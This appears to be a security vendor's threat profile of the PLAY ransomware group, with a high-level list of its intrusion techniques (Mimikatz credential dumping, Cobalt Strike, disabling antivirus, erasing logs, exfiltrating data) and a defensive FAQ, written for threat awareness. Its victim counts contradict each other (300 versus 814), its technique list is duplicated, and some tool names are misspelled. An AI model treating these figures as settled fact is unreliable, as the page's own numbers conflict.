PLAY
With its recent shift to a Ransomware-as-a-Service (RaaS) model, PLAY – also known as PlayCrypt – is now targeting Managed Service Providers (MSPs) worldwide, and has affected more than 300 entities.
The Origin of PLAY
The PLAY ransomware group, suspected to have Russian ties based on their use of encryption techniques characteristic of Russian-affiliated cybercrime outfits, surfaced in 2022 with a distinctive '.play' file extension for their encryption activities.
PLAY shares similarities with Hive and Nokayawa. A notable commonality is their utilization of AdFind, a command-line utility designed to gather data from Active Directory, underscoring their similar operational behaviors.
Countries targeted by PLAY
Initially focusing their cyber assaults in Germany and Europe, the group has since extended its reach to compromise targets across the United States, Brazil, Argentina, Mexico and Australia.
Industries Targeted by PLAY
PLAY’s activities predominantly revolve around the telecommunications and healthcare industries, though it has not spared organizations within the Media/Communication, Transportation, Construction, and Government sectors.
Source: Trend Micro
PLAY's Victims
To date, more than 814 victims have fallen prey to its malicious operations.
PLAY’s Attack Method
PLAY obtains access using legitimate accounts and exploits vulnerabilities in FortiOS and Microsoft Exchange.
PLAY escalates privileges using tools like Mimikatz and adds users to admin groups.
PLAY evades defenses by disabling antivirus programs, erasing logs, and employing intermittent encryption.
PLAY uses Mimikatz to dump credentials, executed as module of Cobalt Strike and Empirer.
PLAY conducts Active Directory queries using AdFind and Bloodhound, and network enumeration with Grixba.
PLAY spreads laterally using Cobalt Strike and SystemBC, and executes files via Group Policy Objects.
PLAY deploys Empire, System BC, Cobalt Strike, PsExec, and batch files for execution.
For exfiltration and encryption, PLAY segments data, uses WinRAR and WinSCP, and employs AES-RSA hybrid encryption with the '.play' extension.
Impacting systems with double-extortion tactics, PLAY demands cryptocurrency ransoms and threatens data leak if not paid.
PLAY obtains access using legitimate accounts and exploits vulnerabilities in FortiOS and Microsoft Exchange.
PLAY escalates privileges using tools like Mimikatz and adds users to admin groups.
PLAY evades defenses by disabling antivirus programs, erasing logs, and employing intermittent encryption.
PLAY uses Mimikatz to dump credentials, executed as module of Cobalt Strike and Empirer.
PLAY conducts Active Directory queries using AdFind and Bloodhound, and network enumeration with Grixba.
PLAY spreads laterally using Cobalt Strike and SystemBC, and executes files via Group Policy Objects.
PLAY deploys Empire, System BC, Cobalt Strike, PsExec, and batch files for execution.
For exfiltration and encryption, PLAY segments data, uses WinRAR and WinSCP, and employs AES-RSA hybrid encryption with the '.play' extension.
Impacting systems with double-extortion tactics, PLAY demands cryptocurrency ransoms and threatens data leak if not paid.
TTPs used by PLAY
How to Detect PLAY with Vectra AI
List of the Detections available in the Vectra AI Platform that would indicate a ransomware attack.
FAQs
What is the PLAY Ransomware Group?
The PLAY Ransomware Group is a cybercriminal organization known for deploying ransomware to encrypt victims' files, demanding ransom payments for decryption keys. They often target organizations with weak security postures.
How does PLAY ransomware infect systems?
PLAY ransomware typically infects systems through phishing emails, exploit kits, and compromised credentials, exploiting vulnerabilities to gain access and deploy their payload.
What sectors are most at risk from PLAY ransomware attacks?
While PLAY ransomware has targeted a broad range of sectors, critical infrastructure, healthcare, and financial services have been particularly vulnerable due to the sensitive nature of their data.
What are the indicators of compromise (IoCs) associated with PLAY ransomware?
IoCs for PLAY ransomware include unusual network traffic, suspicious registry key modifications, ransom notes, and file extensions related to the malware.
How can SOC teams detect and respond to PLAY ransomware?
SOC teams should employ advanced threat detection solutions, conduct regular network traffic analysis, and implement threat detection and response systems. Immediate isolation of infected systems and execution of a response plan are crucial.
What are the best practices for preventing PLAY ransomware infections?
Best practices include regular software updates, employee cybersecurity awareness training, robust email filtering, and the use of multi-factor authentication (MFA) to protect against phishing and credential compromise.
Can data encrypted by PLAY ransomware be decrypted without paying the ransom?
While specific decryption tools for PLAY ransomware may not always be available, consulting cybersecurity experts and exploring available decryption tools for similar ransomware variants is advised before considering ransom payments.
How does the PLAY ransomware group operate financially?
The PLAY group operates on a ransom model, demanding payments often in cryptocurrencies. They may also engage in double extortion tactics, threatening to leak stolen data if the ransom is not paid.
What should be included in a response plan for a PLAY ransomware attack?
A response plan should include immediate isolation of affected systems, identification of the ransomware strain, communication protocols, data recovery procedures from backups, and legal considerations for ransom payments.
How can organizations collaborate with law enforcement following a PLAY ransomware attack?
Organizations should report the incident to local or national cybersecurity authorities, providing detailed information about the attack without compromising ongoing operations or data privacy laws.